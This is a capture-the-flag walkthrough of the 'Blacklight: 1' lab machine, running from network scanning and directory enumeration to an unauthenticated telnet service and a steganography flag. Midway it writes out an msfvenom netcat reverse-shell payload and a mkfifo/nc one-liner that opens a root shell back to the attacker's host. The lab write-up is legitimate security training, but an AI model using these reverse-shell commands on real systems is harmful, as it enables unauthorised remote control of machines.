Blacklight: 1 Walkthrough

Lab Environment


Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux


Vulnerable Machine : Blacklight: 1


Let’s start hacking and breach the security of this machine.


Scanning Phase : Let’s start by finding our attacking machine’s IP.
Syntax used : ifconfig
Results : 192.168.1.6



Now let’s scan the local network to which both the attacking machine and the vulnerable machine are connected.
Syntax used : arp-scan --local
Results : 192.168.1.8




Enumeration Phase : Now using nmap to scan the services running on the open ports.
Syntax used : nmap -p- -A 192.168.1.8 -Pn
Results : an HTTP service is running on port 80, and port 9072 is also open




Now browsing to the IP in a browser to see the webpage being served.




Now fired up dirb to reveal the directories.
Syntax used : dirb http://192.168.1.8
Results : found something in robots.txt




Now browsing to the robots.txt URL in the browser.
Results : flag1.txt , blacklight.dict


Now opening flag1.txt in the browser.
Syntax used : 192.168.1.8/flag1.txt
Results : the value of the flag and the hint "9072 the secret is at home"




Now tried to open the dictionary file named blacklight.dict.
Syntax used : 192.168.1.8/blacklight.dict




After all this I tried to connect to port 9072 with telnet and found that it is unauthenticated, so no password is needed.
Syntax used : telnet 192.168.1.8 9072
Results : on connecting, a message is displayed: type .help for instructions
From the help output we learn that only a limited set of commands can be executed.




Since it is a shell, I used a cmd payload to get a reverse shell with netcat.
Syntax used : msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.6 lport=1337 R
Results : got the raw output of the payload




Now copied the raw output and pasted it into the shell obtained with telnet.
Syntax used : .exec mkfifo /tmp/fgxypp; nc 192.168.1.6 1337 0</tmp/fgxypp | /bin/sh >/tmp/fgxypp 2>&1; rm /tmp/fgxypp
Explanation : .exec is placed before the raw payload output, since the telnet shell’s help clearly shows that .exec is the command used to execute commands.




Fired up netcat as a listener and got the reverse connection.
Syntax used : nc -lvp 1337
Results : got the reverse connection




Syntax used : whoami
Results : root
Explanation : to find out which user I am
Now spawning a proper shell.
Syntax used : python -c 'import pty; pty.spawn("/bin/bash")'




As we saw when opening flag1.txt, the message said that the secret is at home, so now it’s time to navigate to the home directory and find the secret folder/file.
After exploring, I found a hidden directory named .secret.
Syntax used to view hidden directories : ls -la




Now entered the secret directory and got one more flag.
Syntax used : cd .secret
Results : flag2-inside.jpg
Copied the flag2 file to /var/www/html on the victim machine so that I could access it through the browser.
Syntax used : cp flag2-inside.jpg /var/www/html


Now browsed to the victim’s IP with the file name appended.
Syntax used : 192.168.1.8/flag2-inside.jpg
Results : got an image; saved it, and it gave me the hint to use the outguess tool, as Out and Guess were capitalized




Used outguess to reveal the information hidden inside the image.
Syntax used : outguess -r /root/Desktop/flag2-inside.jpg -t flag2.txt
Explanation : -r retrieves the hidden data from the given file (the file on which the operation is performed)
-t is used to write statistic information to the file.
Here I used flag2.txt as the name of the output file.


Here’s the file named flag2.txt.


Read the flag.
Syntax used : cat flag2.txt
Results : flag2

